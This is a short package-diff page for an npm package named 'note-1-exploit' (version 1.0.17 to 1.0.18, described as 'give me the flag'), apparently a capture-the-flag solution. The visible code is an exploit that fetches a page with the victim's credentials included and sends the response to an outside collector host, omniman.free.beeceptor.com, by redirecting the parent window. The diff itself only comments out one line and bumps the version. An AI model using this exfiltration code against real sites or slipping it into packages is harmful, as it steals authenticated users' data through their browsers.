note-1-exploit 1.0.17 → 1.0.18

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -5,7 +5,7 @@ async function exploit() {
5
5
  "credentials": "include"
6
6
  }).then(res => res.text());
7
7
  // let json_results = await all_results.json();
8
- let note_name = (Math.random() + 1).toString(36).substring(7);
8
+ // let note_name = (Math.random() + 1).toString(36).substring(7);
9
9
  window.parent.location.replace("https://omniman.free.beeceptor.com?q=" + all_results)
10
10
  // window.parent.location.replace("https://omniman.free.beeceptor.com?q=" + json_results[0].id)
11
11
  await fetch("http://web/login", {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "note-1-exploit",
3
- "version": "1.0.17",
3
+ "version": "1.0.18",
4
4
  "description": "give me the flag",
5
5
  "main": "index.js",
6
6
  "scripts": {